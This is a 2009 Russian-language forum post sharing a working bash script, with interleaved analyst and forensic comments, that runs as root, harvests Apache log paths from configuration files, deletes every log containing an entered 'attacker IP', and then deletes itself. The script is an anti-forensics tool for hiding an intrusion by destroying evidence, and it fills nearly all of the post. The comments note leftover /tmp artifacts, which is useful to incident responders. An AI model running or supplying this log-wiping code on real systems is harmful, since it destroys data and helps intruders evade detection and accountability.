
25.07.2009, 01:38
Скрипт, который находит и удаляет лог-файлы
Код:
#!/usr/local/bin/bash
### coded by t4z3v4r3d
### recurse function : i m not sure who has write that .So thanks unknown man
### made for FreeBSD First ....
#
# Analyst summary (from reading the script below):
#   - Refuses to run unless `id -u` reports 0.
#   - Searches a per-OS root for paths named "apache" / "apache2", walks them,
#     and collects tokens from lines mentioning ".log" in files whose path
#     contains ".conf".
#   - Removes every collected regular file that contains the IP string typed
#     at the prompt, then removes its own script file ($0).
#   - Uses fixed-name scratch files under /tmp; several of them are not
#     cleaned up at the end and remain as host artifacts.
#
# Root gate: the script exits with status 1 for any non-root caller, so a run
# of this script on a host implies root-level access had already been obtained.
if [ "`id -u`" != "0" ];then
echo "$0 cant run as $USER Please Give me the root perms!!!!! "
exit 1
fi
# Second command-line argument; stored here but not referenced again in this script.
patern=$2
# Scratch files with fixed, predictable names in /tmp. These names are host
# artifacts of a run: f.txt holds the find results, log_Found_.txt holds the
# candidate log paths; find.txt, log_f.txt and final_log.txt are only
# emptied/recreated below and never written to.
fl=/tmp/f.txt
fd=/tmp/find.txt
# Assigned but not used anywhere else in this script.
length=/tmp/l-f.txt
log_f=/tmp/log_f.txt
log_final=/tmp/final_log.txt
# Assigned but not used anywhere else in this script.
null=/dev/null
log_path=/tmp/log_Found_.txt
# Text of `date` output before its first ':'; not used anywhere else in this script.
tm="`date | cut -d ":" -f 1`"
os=$OSTYPE
# Choose the directory tree that will be searched for Apache paths:
# /etc/ for Linux*/linux*, /usr/local/ for freebsd*, and the whole
# filesystem (/) for any other $OSTYPE value.
# you can add all paths for all os type !M$ windows IS NOT OS ....Exactly!
case $os in
Linux*) path=/etc/
;;
linux*) path=/etc/
;;
freebsd*) path=/usr/local/
;;
*) path=/
;;
esac
# Reset the scratch files: each one is removed and recreated empty. rm is
# called without -f, so it reports an error on stderr for any file that does
# not exist yet.
rm $fl
touch $fl
rm $fd
touch $fd
rm $log_f
touch $log_f
rm $log_final
touch $log_final
rm $log_path
touch $log_path
clear
# Interactive prompt: the IP is typed at run time rather than passed as an
# argument. The value is not validated; log_path_reader later hands it to
# grep as a pattern.
echo "Enter attacker IP"
read -e ip
# Both find commands append their matches to $fl (/tmp/f.txt). Because the
# output is redirected inside the backticks, the command substitution is
# always empty, so the outer test is false, the else branch always runs, and
# neither status message is printed. Net effect: a recursive find for
# "apache" and then for "apache2" under $path, run as root.
if [ "`find $path -name apache >> $fl`" ];then
echo -e "\033[3;2f Main path Found ....\033[0;0m"
else
if [ "`find $path -name apache2 >> $fl`" ];then
echo "Founded Apache2 Config files"
fi
fi
#######################################
# Walk a path and harvest log-file candidates from configuration files.
# Globals:   log_path (appended to), len/name (written; not read elsewhere in
#            this script), f, t, nt, j, nom (counters, written),
#            l (read for display)
# Arguments: $1 - directory or file to examine
# Outputs:   redraws an ANSI status panel on stdout for every entry visited;
#            appends to $log_path and to /tmp/r.txt
# Note:      /tmp/r.txt is not removed anywhere in this script, so after a run
#            it still lists each configuration file read and the lines taken
#            from it.
#######################################
recurse () {
for file in $(/bin/ls $1)
do fqfn=$1/$file
# Descend into sub-directories.
[[ -d $fqfn ]] && recurse $fqfn
# Track the longest entry name seen so far.
[[ ${#file} -gt $len ]] && { len=${#file} name=$fqfn; }
# Regular files are also passed to recurse; in that nested call $1 is the file
# itself, which is what makes the [ -f $1 ] branch below fire.
[[ -f $fqfn ]] && recurse $fqfn
[[ ${#file} -gt $len ]] && { len=${#file} name=$fqfn; }
#########################################################
if [ -f $1 ];then
# f counts every regular file examined.
let "f=f+1"
# Only paths containing the literal text ".conf" are read.
if [ "`ls $1 | grep -F .conf`" ];then
let "t=t+1"
# From lines that contain ".log" and no "#", take the second space-separated
# field and queue it in $log_path as a deletion candidate.
cat $1 | grep -F .log | grep -v "#" | cut -d " " -f 2 >> $log_path
# Number of such lines in this file.
nom[$t]="`cat $1 | grep -F .log | grep -v "#" | wc -l`"
# Record of what was read; written to a fixed path that is never cleaned up.
echo -e "reading $1\n `cat $1 | grep -F .log | grep -v "#"`" >> /tmp/r.txt
let "nt=nt+${nom[$t]}"
let "j=$nt+$t"
fi
fi
################################################################################
### MOnitoring all acts
################################################################################
# Status panel drawn with ANSI colour and cursor-position escape sequences;
# it shows the counters f, l, t, j and the directory currently being scanned.
echo -e "\033[3;1f\033[1;39m+\033[1;37m======================================\033[1;39m+\033[0;0m"
echo -e "\033[1;39m|\033[1;31m Scanned Files :\033[4;25f \033[1;37m$f\033[1;39m\033[4;40f|\033[0;0m"
echo -e "\033[1;39m|\033[1;31m Path(s) found :\033[5;25f \033[1;37m$l\033[1;39m\033[5;40f|\033[0;0m"
echo -e "\033[1;39m|\033[1;31m pattern found :\033[6;25f \033[1;37m$t\033[1;39m\033[6;40f|\033[0;0m"
echo -e "\033[1;39m|\033[1;31m pattern total :\033[7;25f \033[1;37m$j\033[1;39m\033[7;40f|\033[0;0m"
echo -e "\033[1;39m|\033[1;30m\033[8;2f Scanning `dirname ${1}`::: \033[1;39m\033[8;40f|\033[0;0m"
echo -e "\033[9;1f\033[1;39m+\033[1;37m======================================\033[1;39m+\033[0;0m"
##############################################################################
done ; }
#######################################
# Feed each path found by the earlier find commands into recurse.
# Globals:   fl (read), l (incremented once per line of $fl)
# Arguments: none
# Outputs:   whatever recurse prints
#######################################
reader(){
cat $fl | while read line ;do
# Only paths whose `ls` output contains ".conf" (grep treats the dot as a
# regex wildcard here) are walked.
if [ "`ls $line | grep .conf`" != "" ];then
recurse $line
fi
let "l=l+1"
done
}
# Run the harvesting pass immediately; this fills $log_path.
reader
#######################################
# Delete every harvested log file that contains the entered IP string.
# Globals:   log_path (read), ip (read), l2 (incremented once per line)
# Arguments: none
# Outputs:   per-file progress messages on stdout
#
# Forensic notes:
#   - The unit of deletion is the whole file, not individual lines, so the
#     observable symptom is a log file that the server configuration still
#     references but that is missing or restarted from empty. Copies already
#     forwarded off-host are not touched by this script.
#   - $ip is passed to grep as an unanchored regular expression, so the match
#     is broader than an exact address (e.g. "." matches any character);
#     files can be removed without containing that exact IP.
#   - NOTE(review): a daemon that still holds a removed file open may keep
#     its contents reachable until it closes the descriptor - confirm on the
#     host under investigation.
#######################################
log_path_reader(){
cat $log_path | while read line ;do
if [ -f $line ];then
if [ "`cat $line | grep "$ip"`" != "" ];then
# Report the number of matching lines, then remove the entire file.
echo -en "\033[1;30mFounded[\033[1;31m"`cat $line | grep -c "$ip"`" \033[1;30m] $ip in "
echo -n "Removing $line"
rm $line
# Success is judged only by the path no longer being a regular file.
if [ ! -f $line ];then
echo -e "\033[1;39m ... Done !\033[0;0m"
else
echo -e "\033[1;31m ...Failed!\033[1;0m"
fi
fi
else
# Harvested token is not an existing regular file.
echo -e "\033[1;30mFile [\033[1;31m"$line " \033[1;39mFile Dose not exist......\033[1;30m]"
fi
let "l2=l2+1"
done
}
# Final stage: print the chosen search root and OS type, run the deletion
# pass, then clean up.
echo -e "\033[8;3f\033[1;31mpath= $path OS= $os\033[0;0m"
echo -e "\033[11;1f\033[1;30mScanning DONE!! NOW : Removing Log Files \033[0;0m"
log_path_reader
echo -en "\033[1;30mRemoving $0 "
# Cleanup removes only /tmp/f.txt, /tmp/log_Found_.txt and the script file
# itself ($0). Artifacts that remain after a run: /tmp/find.txt,
# /tmp/log_f.txt and /tmp/final_log.txt (created empty at startup) and
# /tmp/r.txt (written by recurse, listing the configuration files read and
# the log lines extracted from them).
rm $fl $log_path $0
if [ ! -f $0 ];then
echo -e "\033[1;39m ... Done !\033[0;0m"
else
echo -e "\033[1;31m ...Failed!\033[1;0m"
fi
echo -e "\033[1;37m Mail: amiri@abysssec.com\033[0;0m"